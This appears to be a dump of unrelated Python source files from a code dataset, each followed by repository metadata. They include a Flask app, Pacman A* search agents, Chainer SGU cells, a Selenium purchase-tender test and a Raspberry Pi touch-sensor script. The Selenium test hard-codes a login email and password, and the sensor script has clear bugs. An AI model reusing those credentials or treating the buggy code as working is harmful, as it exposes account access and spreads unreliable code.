# interrupting each other, you must be *very* careful when using global
# state. A method could easily clobber the state set by another while
# the latter method is running.
######################################### noqa
VERSION = "0.0.1"
GIT_URL = "https://github.com/jungbluth/kb_irep"
GIT_COMMIT_HASH = "27849324019fb7eeabff2796e9e33115d976f459"
#BEGIN_CLASS_HEADER
#END_CLASS_HEADER
# config contains contents of config file in a hash or None if it couldn't
# be found
def __init__(self, config):
#BEGIN_CONSTRUCTOR
self.callback_url = os.environ['SDK_CALLBACK_URL']
self.shared_folder = config['scratch']
logging.basicConfig(format='%(created)s %(levelname)s: %(message)s',
level=logging.INFO)
#END_CONSTRUCTOR
pass
def run_kb_irep(self, ctx, params):
"""
This example function accepts any number of parameters and returns results in a KBaseReport
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_kb_irep
report = KBaseReport(self.callback_url)
report_info = report.create({'report': {'objects_created':[],
'text_message': params['parameter_1']},
'workspace_name': params['workspace_name']})
output = {
'report_name': report_info['name'],
'report_ref': report_info['ref'],
}
#END run_kb_irep
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_kb_irep return value ' +
'output is not type dict as required.')
# return the results
return [output]
def status(self, ctx):
#BEGIN_STATUS
returnVal = {'state': "OK",
'message': "",
'version': self.VERSION,
'git_url': self.GIT_URL,
'git_commit_hash': self.GIT_COMMIT_HASH}
#END_STATUS
return [returnVal]
| [
"jungbluth.sean@gmail.com"
] | jungbluth.sean@gmail.com |
db5c965f2a0a9a8eca0e23b6beaa853f2fa82cff | 14d7dbf445a5fde2a6611c41cd55bc17978afec4 | /flask_app/application.py | bfdd92df2989f1ed4b3c63654868c835612a6b6b | [] | no_license | Happollyon/Class2 | a7ef72caefebf5e23209b06ecf84560d3b73394f | 8136fd0c70cf1cc4e82361d5a2ca54c282e5066c | refs/heads/master | 2022-09-17T07:14:09.356631 | 2020-05-28T14:23:37 | 2020-05-28T14:23:37 | 257,603,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | from flask import Flask, render_template,request, session
#from flask_session import Session
app=Flask(__name__)
@app.route('/')
def index():
return "Hello world"
@app.route('/fagner')
def fagner():
return"hello fagner"
@app.route("/<string:name>") # you can set a rout name
def hello(name):
return f"hello, {name}"
#templates look at netes and conditions inside ginger
#extend templates
| [
"36013973+Happollyon@users.noreply.github.com"
] | 36013973+Happollyon@users.noreply.github.com |
a564fadbeb8da66f7e99e8a1c5af6eec0923b3f2 | 5160cd2cf1ff8aa1d48935a783ba39e59f8d9ca7 | /src/py.py | bbfff52bf7a351f5fc2d85e6364080af152fd517 | [] | no_license | harry-uglow/BananaBeats | eb9df6f9458e1d12a406f0d96dbe9980f278af6e | 2e0eb211f5646be5675237c5c1c70d2feed8c57f | refs/heads/master | 2021-01-19T12:47:57.520881 | 2017-08-29T20:36:19 | 2017-08-29T20:36:19 | 100,810,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | import subprocess
import threading
import sys
import time
import pygame
import os
import signal
import python.adafruit_libraries.Adafruit_MPR121.MPR121 as MPR121
print('strt')
p = subprocess.Popen(['./main'], stdin = subprocess.PIPE, close_fds=True, shell=True)
# Maybe add shell=True if it doesn't work
print('mon')
monitorInputs()
def monitorInputs():
# Create MPR121 instance
device = MPR121.MPR121()
if not device.begin():
sys.exit(1)
pygame.mixer.pre_init(44100, -16, 12, 2048)
pygame.init()
# Main loop to play the corroect sound every time a pin is touched
last_touched = device.touched()
while True:
current_touched = device.touched()
for i in range(12):
pin_bit = 1 << i
if current_touched & pin_bit and not last_touched & pin_bit:
p.stdin.write('t' + i + '\n')
print('t' + i)
p.stdin.flush()
print('Pin ', i, ' touched') # Get rid of this?
if not current_touched & pin_bit and last_touched & pin_bit:
p.stdin.write('r' + i + '\n')
p.stdin.flush() # Get rid of this?
print('Pin ', i, ' released')
last_touched = current_touched
time.sleep(0.1)
| [
"mauriceyap@hotmail.co.uk"
] | mauriceyap@hotmail.co.uk |
ce2ce7dc2c0f952870f86143e1a519cfa7a22b93 | 2825a2d056db418a3bf04d8d2ffc7133cd552d0f | /jsondiff/mountpoint.py | b2b2f60d5cdfca5d072f5297f75289d5d311cb15 | [] | no_license | trendsnet/jsondiff | eabba41a2c9111d2a2aefdb460564fcc7f1743b8 | dce2af96542cb986dd1bd927972faf8c505364d9 | refs/heads/master | 2020-05-30T04:57:37.713001 | 2017-05-08T07:41:22 | 2017-05-08T07:41:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | #coding:utf-8
__author__ = 'Feng Lu'
from .views.diff import diff
MOUNT_POINTS = ((diff, "/diff"),
(diff, "/"),
) | [
"liyanjie8@wanda.cn"
] | liyanjie8@wanda.cn |
973f38ed0345cb23c877e3d788c07856de7093ea | aa97a1a30d3f4cc65b80cfbb76ff88f55e96f67b | /A-Star-Search/search/searchAgents.py | bf0c1649b6b366a5fb4c716f1af59a0f9fa5d13a | [] | no_license | yorhaha/AI-Tasks | a0df0728ef013fd8053d3ef699b04baa38b931ce | 6197b9990f997bcf9f3f5ccb6773513670b35ea0 | refs/heads/main | 2023-09-03T16:50:48.365762 | 2021-10-30T02:04:13 | 2021-10-30T02:04:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,856 | py | """
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
"An agent that goes West until it can't."
def getAction(self, state):
"The agent receives a GameState (defined in pacman.py)."
if Directions.WEST in state.getLegalPacmanActions():
return Directions.WEST
else:
return Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
"""
This very general search agent finds a path using a supplied search
algorithm for a supplied search problem, then returns actions to follow that
path.
As a default, this agent runs DFS on a PositionSearchProblem to find
location (1,1)
Options for fn include:
depthFirstSearch or dfs
breadthFirstSearch or bfs
aStarSearch or astar
Note: You should NOT change any code in SearchAgent
"""
def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
# Warning: some advanced Python magic is employed below to find the right functions and problems
# Get the search function from the name and heuristic
if fn not in dir(search):
raise AttributeError(fn + ' is not a search function in search.py.')
func = getattr(search, fn)
if 'heuristic' not in func.__code__.co_varnames:
print('[SearchAgent] using function ' + fn)
self.searchFunction = func
else:
if heuristic in globals().keys():
heur = globals()[heuristic]
elif heuristic in dir(search):
heur = getattr(search, heuristic)
else:
raise AttributeError(heuristic + ' is not a function in searchAgents.py or search.py.')
print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
# Note: this bit of Python trickery combines the search algorithm and the heuristic
self.searchFunction = lambda x: func(x, heuristic=heur)
# Get the search problem type from the name
if prob not in globals().keys() or not prob.endswith('Problem'):
raise AttributeError(prob + ' is not a search problem type in SearchAgents.py.')
self.searchType = globals()[prob]
print('[SearchAgent] using problem type ' + prob)
def registerInitialState(self, state):
"""
This is the first time that the agent sees the layout of the game
board. Here, we choose a path to the goal. In this phase, the agent
should compute the path to the goal and store it in a local variable.
All of the work is done in this method!
state: a GameState object (pacman.py)
"""
if self.searchFunction == None: raise Exception("No search function provided for SearchAgent")
starttime = time.time()
problem = self.searchType(state) # Makes a new search problem
self.actions = self.searchFunction(problem) # Find a path
totalCost = problem.getCostOfActionSequence(self.actions)
print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
def getAction(self, state):
"""
Returns the next action in the path chosen earlier (in
registerInitialState). Return Directions.STOP if there is no further
action to take.
state: a GameState object (pacman.py)
"""
if 'actionIndex' not in dir(self): self.actionIndex = 0
i = self.actionIndex
self.actionIndex += 1
if i < len(self.actions):
return self.actions[i]
else:
return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
"""
A search problem defines the state space, start state, goal test, child
function and cost function. This search problem can be used to find paths
to a particular point on the pacman board.
The state space consists of (x,y) positions in a pacman game.
Note: this search problem is fully specified; you should NOT change it.
"""
def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
"""
Stores the start and goal.
gameState: A GameState object (pacman.py)
costFn: A function from a search state (tuple) to a non-negative number
goal: A position in the gameState
"""
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
if start != None: self.startState = start
self.goal = goal
self.costFn = costFn
self.visualize = visualize
if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
print('Warning: this does not look like a regular search maze')
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def getStartState(self):
return self.startState
def isGoalState(self, state):
isGoal = state == self.goal
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state)
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def expand(self, state):
"""
Returns child states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples,
(child, action, stepCost), where 'child' is a
child to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that child
"""
children = []
for action in self.getActions(state):
nextState = self.getNextState(state, action)
cost = self.getActionCost(state, action, nextState)
children.append( ( nextState, action, cost) )
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state not in self._visited:
self._visited[state] = True
self._visitedlist.append(state)
return children
def getActions(self, state):
possible_directions = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
valid_actions_from_state = []
for action in possible_directions:
x, y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
valid_actions_from_state.append(action)
return valid_actions_from_state
def getActionCost(self, state, action, next_state):
assert next_state == self.getNextState(state, action), (
"Invalid next state passed to getActionCost().")
return self.costFn(next_state)
def getNextState(self, state, action):
assert action in self.getActions(state), (
"Invalid action passed to getActionCost().")
x, y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
return (nextx, nexty)
def getCostOfActionSequence(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999.
"""
if actions == None: return 999999
x,y= self.getStartState()
cost = 0
for action in actions:
# Check figure out the next state and see whether its' legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
cost += self.costFn((x,y))
return cost
def manhattanHeuristic(position, problem, info={}):
"The Manhattan distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def euclideanHeuristic(position, problem, info={}):
"The Euclidean distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return ( (xy1[0] - xy2[0]) ** 2 + (xy1[1] - xy2[1]) ** 2 ) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
class FoodSearchProblem:
"""
A search problem associated with finding the a path that collects all of the
food (dots) in a Pacman game.
A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
"""
def __init__(self, startingGameState):
self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
self.walls = startingGameState.getWalls()
self.startingGameState = startingGameState
self._expanded = 0 # DO NOT CHANGE
self.heuristicInfo = {} # A dictionary for the heuristic to store information
def getStartState(self):
return self.start
def isGoalState(self, state):
return state[1].count() == 0
def expand(self, state):
"Returns child states, the actions they require, and a cost of 1."
children = []
self._expanded += 1 # DO NOT CHANGE
for action in self.getActions(state):
next_state = self.getNextState(state, action)
action_cost = self.getActionCost(state, action, next_state)
children.append( ( next_state, action, action_cost) )
return children
def getActions(self, state):
possible_directions = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
valid_actions_from_state = []
for action in possible_directions:
x, y = state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
valid_actions_from_state.append(action)
return valid_actions_from_state
def getActionCost(self, state, action, next_state):
assert next_state == self.getNextState(state, action), (
"Invalid next state passed to getActionCost().")
return 1
def getNextState(self, state, action):
assert action in self.getActions(state), (
"Invalid action passed to getActionCost().")
x, y = state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
nextFood = state[1].copy()
nextFood[nextx][nexty] = False
return ((nextx, nexty), nextFood)
def getCostOfActionSequence(self, actions):
"""Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999"""
x,y= self.getStartState()[0]
cost = 0
for action in actions:
# figure out the next state and see whether it's legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]:
return 999999
cost += 1
return cost
class AStarFoodSearchAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
self.searchType = FoodSearchProblem
def foodHeuristic(state, problem: FoodSearchProblem):
"""
Your heuristic for the FoodSearchProblem goes here.
This heuristic must be consistent to ensure correctness. First, try to come
up with an admissible heuristic; almost all admissible heuristics will be
consistent as well.
If using A* ever finds a solution that is worse uniform cost search finds,
your heuristic is *not* consistent, and probably not admissible! On the
other hand, inadmissible or inconsistent heuristics may find optimal
solutions, so be careful.
The state is a tuple ( pacmanPosition, foodGrid ) where foodGrid is a Grid
(see game.py) of either True or False. You can call foodGrid.asList() to get
a list of food coordinates instead.
If you want access to info like walls, capsules, etc., you can query the
problem. For example, problem.walls gives you a Grid of where the walls
are.
If you want to *store* information to be reused in other calls to the
heuristic, there is a dictionary called problem.heuristicInfo that you can
use. For example, if you only want to count the walls once and store that
value, try: problem.heuristicInfo['wallCount'] = problem.walls.count()
Subsequent calls to this heuristic can access
problem.heuristicInfo['wallCount']
"""
position, foodGrid = state
"*** YOUR CODE HERE ***"
# TODO: Finished
def getDistance(pos1, pos2, gameStartState):
childProblem = PositionSearchProblem(gameStartState, start=pos1, goal=pos2, warn=False, visualize=False)
solution = search.breadthFirstSearch(childProblem)
return len(solution)
value = 0
for x in range(foodGrid.width):
for y in range(foodGrid.height):
if foodGrid[x][y]:
length = getDistance(position, (x, y), problem.startingGameState)
value = length if value < length else value
return value
| [
"blueice-thu@outlook.com"
] | blueice-thu@outlook.com |
e41f7a4ee3dff131d8b4f169176cf7ead839fc16 | 8af82d8482761aa99f6db95527a20c8854c00fdb | /PT_Approve.py | e951714fc9aff612626a16950f2f94ad0101e9a3 | [] | no_license | vandy1992/SCM-Automation | 62c02f665dcf42e79459f7aec575f07e35720c81 | 38c4266b943ece80df66ea32ba22f774a46df6c6 | refs/heads/master | 2022-11-20T13:15:56.572776 | 2020-07-10T09:05:47 | 2020-07-10T09:05:47 | 278,587,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,805 | py | import unittest
# import HtmlTestRunner
import time
import allure
from allure_commons.types import AttachmentType
from selenium import webdriver
import sys
sys.path.append("C://Users/Vandana Mallaiah/PycharmProjects/loginpage") #run through cmd and to generate report we need this or else no need
from pages.purchase_tender_page import Purchase_Tender
#https://clever-brahmagupta-0d6b23.netlify.app
class purchase_tender_Test(unittest.TestCase):
baseURL="https://testscm.digicollect.com/"
email ="manager@testdigibar.com"
password ="testdigibar123"
# driver = webdriver.Firefox(executable_path="E:\geckodriver-v0.26.0-win64\geckodriver.exe")
driver = webdriver.Chrome(executable_path="E:\chromedriver_win32\chromedriver.exe")
prno="DIGICOLLECT1234"
Bran="Test Digibar"
trno="vandy@@K654"
@classmethod
def setUpClass(cls):
cls.driver.get(cls.baseURL)
cls.driver.maximize_window()
def test_Purchase_tender(self):
pt=Purchase_Tender(self.driver)
time.sleep(3)
allure.attach(self.driver.get_screenshot_as_png(), name="loginpage", attachment_type=AttachmentType.PNG)
pt.login_page("manager@testdigibar.com","testdigibar123")
time.sleep(5)
allure.attach(self.driver.get_screenshot_as_png(), name="homepage", attachment_type=AttachmentType.PNG)
pt.click_create_new()
time.sleep(3)
pt.click_foreign()
time.sleep(3)
pt.click_tr_no(self.trno)
pt.click_pr_no()
pt.click_branch()
pt.click_dept()
pt.click_Attention()
pt.click_date()
pt.click_currency()
pt.click_authorised()
pt.click_phone()
# pt.click_address()
# pt.click_Save()
pt.click_same_as_billing()
pt.click_product()
pt.other_info()
# pt.file_attach()
pt.click_saveandsend()
allure.attach(self.driver.get_screenshot_as_png(), name="sendapproval", attachment_type=AttachmentType.PNG)
pt.approval()
pt.click_send()
pt.click_approve()
pt.enter_note()
pt.click_yes()
pt.click_List()
allure.attach(self.driver.get_screenshot_as_png(), name="listview", attachment_type=AttachmentType.PNG)
pt.click_single()
# pt.click_approved()
pt.click_view_attach()
allure.attach(self.driver.get_screenshot_as_png(), name="viewattach", attachment_type=AttachmentType.PNG)
pt.click_close()
pt.click_single()
pt.click_list_delete()
allure.attach(self.driver.get_screenshot_as_png(), name="delete", attachment_type=AttachmentType.PNG)
#
if __name__=='__main__':
unittest.main() | [
"noreply@github.com"
] | vandy1992.noreply@github.com |
5d911f4022457d7e47942adf723047dc59cefa2f | 4a5f3b26fca176a80ca8eca796bc646bb225b017 | /attentive-reader-2/sgu.py | 8ddc21a3a0732b54672764fcd0003dcc2dec4e7a | [] | no_license | musyoku/NLP | 9a63dc882b07b017f7cfc72d863c4d9e5cbeff5e | 9b040bb960b65fb2a1c330adafa6c52e3284a0c1 | refs/heads/master | 2021-01-21T04:53:57.029200 | 2016-07-10T17:08:03 | 2016-07-10T17:08:03 | 55,848,677 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,107 | py | import numpy
import chainer
from chainer import cuda
from chainer.functions.activation import sigmoid
from chainer.functions.activation import softplus
from chainer.functions.activation import tanh
from chainer.functions.math import clip
from chainer import link
from chainer.links.connection import linear
from chainer import variable
def hard_sigmoid(x):
return clip.clip(x * 0.2 + 0.5, 0.0, 1.0)
class SGU(link.Chain):
def __init__(self, in_size, out_size):
super(SGU, self).__init__(
W_xh=linear.Linear(in_size, out_size),
W_zxh=linear.Linear(out_size, out_size),
W_xz=linear.Linear(in_size, out_size),
W_hz=linear.Linear(out_size, out_size),
)
def __call__(self, h, x):
x_g = self.W_xh(x)
z_g = tanh.tanh(self.W_zxh(x_g * h))
z_out = softplus.softplus(z_g * h)
z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
h_t = (1 - z_t) * h + z_t * z_out
return h_t
class StatefulSGU(SGU):
def __init__(self, in_size, out_size):
super(StatefulSGU, self).__init__(in_size, out_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulSGU, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(StatefulSGU, self).to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h):
assert isinstance(h, chainer.Variable)
h_ = h
if self.xp == numpy:
h_.to_cpu()
else:
h_.to_gpu()
self.h = h_
def reset_state(self):
self.h = None
def __call__(self, x):
if self.h is None:
xp = cuda.get_array_module(x)
zero = variable.Variable(xp.zeros_like(x.data))
z_out = softplus.softplus(zero)
z_t = hard_sigmoid(self.W_xz(x))
h_t = z_t * z_out
else:
h_t = SGU.__call__(self, self.h, x)
self.h = h_t
return h_t
class DSGU(link.Chain):
def __init__(self, in_size, out_size):
super(DSGU, self).__init__(
W_xh=linear.Linear(in_size, out_size),
W_zxh=linear.Linear(out_size, out_size),
W_go=linear.Linear(out_size, out_size),
W_xz=linear.Linear(in_size, out_size),
W_hz=linear.Linear(out_size, out_size),
)
def __call__(self, h, x):
x_g = self.W_xh(x)
z_g = tanh.tanh(self.W_zxh(x_g * h))
z_out = sigmoid.sigmoid(self.W_go(z_g * h))
z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
h_t = (1 - z_t) * h + z_t * z_out
return h_t
class StatefulDSGU(DSGU):
def __init__(self, in_size, out_size):
super(StatefulDSGU, self).__init__(in_size, out_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulDSGU, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(StatefulDSGU, self).to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h):
assert isinstance(h, chainer.Variable)
h_ = h
if self.xp == numpy:
h_.to_cpu()
else:
h_.to_gpu()
self.h = h_
def reset_state(self):
self.h = None
def __call__(self, x):
if self.h is None:
z_t = hard_sigmoid(self.W_xz(x))
h_t = z_t * 0.5
else:
h_t = DSGU.__call__(self, self.h, x)
self.h = h_t
return h_t | [
"musyoku@users.noreply.github.com"
] | musyoku@users.noreply.github.com |
b215c554ca3a503adec1ad978c11a8f6d483768c | 2d71efd7d8eecd057ba1705ae61bef03358b7605 | /heating/common.py | 4fa33355fe10a9902743eddfea3219bcf3a5bd75 | [] | no_license | graememorgan/smart-thermostat | 9a35765b32b324e907eab76ee36e645ac77d2711 | 7b2294de8d0752f9518f50541a1f2b42610bcb26 | refs/heads/master | 2021-01-10T10:52:36.556316 | 2016-02-04T13:30:02 | 2016-02-04T13:30:02 | 50,459,147 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 99 | py | import datetime
def epoch(date):
return (date - datetime.datetime(1970, 1, 1)).total_seconds()
| [
"mail@graeme.io"
] | mail@graeme.io |
90ab9fd8dbaf028130901ea8dc146e64dc36e060 | 8270ee8435d2c95dcc9f0e8f9f2119a45cafdf34 | /authentication/authentication/urls.py | 62d83125245dc2239a6a24bc1a945d75afe0e38f | [] | no_license | venkatapriya2020/Django_Hands_On | d8fa20124181f8ed59aaea91f2c3ebfec45495b6 | 28bd9d6fd95730c8f85c40c0d284d2d7cb3fe462 | refs/heads/master | 2023-02-04T05:19:42.708484 | 2020-12-20T22:32:28 | 2020-12-20T22:32:28 | 323,177,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 802 | py | """authentication URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path , include
urlpatterns = [
path("",include("users.urls")),
path('admin/', admin.site.urls),
]
| [
"venkatapriya@live.com"
] | venkatapriya@live.com |
bdf356f1b24561547e82750dcf298ac1a820f9f4 | f53ebcc05ccc8892c32fc2b5c121ba0d78451adb | /classify_images.py | a0f79e4a9fbf09917707b7f53e0b97d22a0ea8eb | [] | no_license | XDUNZC/TBtianchi_submit | 4a45e1096fa389ea9123647e7caaa7cb52a9c322 | e6b1497c0063379f34f9e8cab4926fb160944fdd | refs/heads/master | 2023-08-15T19:45:07.112471 | 2020-04-12T06:56:57 | 2020-04-12T06:56:57 | 249,676,498 | 0 | 0 | null | 2023-07-23T09:42:19 | 2020-03-24T10:20:56 | Jupyter Notebook | UTF-8 | Python | false | false | 4,010 | py | from read_dataset import Reader
from save import Saver
from model.Resnet50.run import Worker as MatchWorker
from model.mmdetection_coco import run as DetectionWorker
import utils
import os
import mmcv
import random
class Classifier():
def __init__(self,classify_model,reader):
self.classify_model = classify_model
self.reader = reader
self.class2commoditys = {i:set() for i in range(23)}
self.img_boxes_label_result = {}
self._classify_image()
def _classify_image(self):
print('开始检测所有商品图,并进行分类剪枝:')
# 为了加速debug 只剪枝前1000个商品图
for commodity in mmcv.track_iter_progress(self.reader.commodity_index_list):
labels_in_this_commodity = {i:0 for i in range(23)}
imgs_in_this_commodity = list(self.reader.commodity_index2img_path_list[commodity])
for img in imgs_in_this_commodity:
result_over_thr, labels_over_thr, _ = DetectionWorker.get_result_and_feats(self.classify_model, img)
self.img_boxes_label_result[img] = (result_over_thr, labels_over_thr)
for label in labels_over_thr:
labels_in_this_commodity[label]+=1
labels_in_this_commodity_list = sorted(labels_in_this_commodity.items(), key=lambda x: x[1], reverse=True)[:2] # 取出现类标最多的两个
for i,item in enumerate(labels_in_this_commodity_list):
label, appear_num = item
if i!=0 and appear_num==0:
break
self.class2commoditys[label].add(commodity) # 将商品加入到所属类标下
# 选出具有代表性的图 剪枝商品图
present_imgs = []
random.shuffle(imgs_in_this_commodity)
for img in imgs_in_this_commodity:
result_over_thr, labels_over_thr = self.img_boxes_label_result[img]
if [x for x in labels_in_this_commodity_list if x in labels_over_thr] != []:
present_imgs.append(img)
if len(present_imgs) == 2 : # 控制选择几幅图
break
self.reader.commodity_index2img_path_list[commodity] = present_imgs
def show_classify_result(self):
for label,commoditys in self.class2commoditys.items():
print('lable: ',label,' commoditys: ',commoditys)
def main():
# 初始化文件路径获得类
reader = Reader(test_dataset_path='tcdata/',
img_path='tcdata/test_dataset_3w/image/',
video_path='tcdata/test_dataset_3w/video/')
print("success init reader")
# 初始化结果保存类
saver = Saver()
print("success init saver")
# 执行匹配工作
"""初始化匹配模型"""
# TODO 替换参数
# match_worker = MatchWorker(model_path='./model/Resnet50/models/model-inter-500001.pt')
print("success load match model")
"""初始化获得框模型"""
idx = 0
config_file = ['./model/mmdetection_coco/configs/tbtc_fater_rcnn_voc.py',
'tbtc_retinanet_voc.py', 'tbtc_feature_exteactor_faster_rcnn.py',
'tbtc_feature_exteactor_faster_rcnn.py'][idx]
checkpoint_file = ['./model/mmdetection_coco/checkpoints/faster_rcnn_x101_64x4d_fpn_1x20200324-ba5926a5.pth',
'retinanet_x101_64x4d_fpn_1x20200322-53c08bb4.pth'][idx]
# TODO 替换参数
coco_model = DetectionWorker.get_model(config_file=config_file,
checkpoint_file=checkpoint_file)
print("success load detection model")
"""逐个视频运行"""
classifier = Classifier(coco_model,reader)
print("success build classifier")
# 显示分类结果,正式提交的时候请注释
classifier.show_classify_result()
if __name__ == "__main__":
# success run
print("successful open run.py")
main()
# end run
print("successful end test.py")
| [
"903244773@qq.com"
] | 903244773@qq.com |
a1e59a682c3d21feebcf29921ab2ec3829992fd1 | de3a062138d3fbdfcf76e09915be553aea450e61 | /Tests.py | 2b1454136905d54427a60069f63bcf68cbcf68c4 | [] | no_license | AlyonaMon/autotests | be9d0793ad36f917d7315325c3071042b592207f | 4457f7f3f5ef65b1b67b08221e43693bf7c742f3 | refs/heads/master | 2021-01-11T18:54:34.717373 | 2016-11-14T21:35:02 | 2016-11-14T21:35:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,032 | py | # coding=utf-8
import json
import logging
logger = logging.getLogger(__name__)
logging.basicConfig(datefmt='%m/%d/%Y %I:%M:%S %p', filename="msg.log",
format='%(asctime)s %(name)-20s %(levelname)-8s %(message)s', filemode='w')
from xml.etree import ElementTree
import xml.etree.ElementTree as etree
from xml.dom import minidom
from xml.etree.ElementTree import Element, SubElement, Comment
import csv
global response, test_dic_for_case, name_testsuite, name_testcase
def prettify(elem):
rough_string = ElementTree.tostring(elem, 'utf-8')
reparsed = minidom.parseString(rough_string)
return reparsed.toprettyxml(indent=" ")
# def XML_FILE(name_testsuite, name_testcase, m):
# # print name_testcase, name_testsuite
# top = Element('testsuites', name=str(name_testsuite))
# parent = SubElement(top, 'testsuite', name=str(name_testcase))
# # children = [Element('testsuite', name=str(Tests(response)))]
#
# top.extend(parent)
# return prettify(top)
def STATUS_CODE(response):
# print response.status_code
if response.status_code == 200 or response.status_code == 201:
text = "Response code is 200 or 201"
result = True
else:
text = "Response code is " + str(response.status_code)
result = False
text = text + ": " + str(result)
# print result
return text
def STATUS_CODE_NAME(response):
if response.reason == 'OK':
text = "Status code name has string '" + str(response.reason) + "'"
result = True
else:
text = "Status code name '" + str(response.reason) + "'"
result = False
text = text + ": " + str(result)
return text
def RESPONSE_TIME(response):
# if response.elapsed >
time = response.elapsed.total_seconds()
if time < 0.5:
text = "Response time is less than 0.5ms"
result = time
else:
text = "Response time is more than 0.5ms"
result = "False, time is " + str(time)
text = text + ": " + str(result) + "ms"
return text
def CONTENT_TYPE_IS_PRESENT(response):
if response.content != "":
text = "Content type is present"
result = True
else:
text = "Content type is not present"
result = False
text = text + ": " + str(result)
return text
def RESPONSE_HAS_ACCKEY(r):
text = "Access Key present in response "
if "access_key" in r:
result = r["access_key"]
logger.info('Authentication is successful')
logger.info('Access Key present in response: %s', str(result))
text = text + ": " + str(True)
elif "Message" in r:
logger.setLevel(logging.ERROR)
logger.error('Access Key absent in response: %s', str(r))
text = text + ": " + str(False)
else:
logger.setLevel(logging.ERROR)
logger.error('Fails for an paar App key - Access Key')
text = text + ": " + str(False)
# print text
return text
#
# def _is_empty(text):
# return not text or text.isspace()
"""def indent(elem, level=0, tab=' '):
i = '\n' + level * tab
j = i + tab # j = i_n+1
indent_parent = False
if len(elem):
if _is_empty(elem.text):
# Indent before element.
elem.text = j
if _is_empty(elem.tail):
# Indent after element.
elem.tail = i
prev = None
for child in elem:
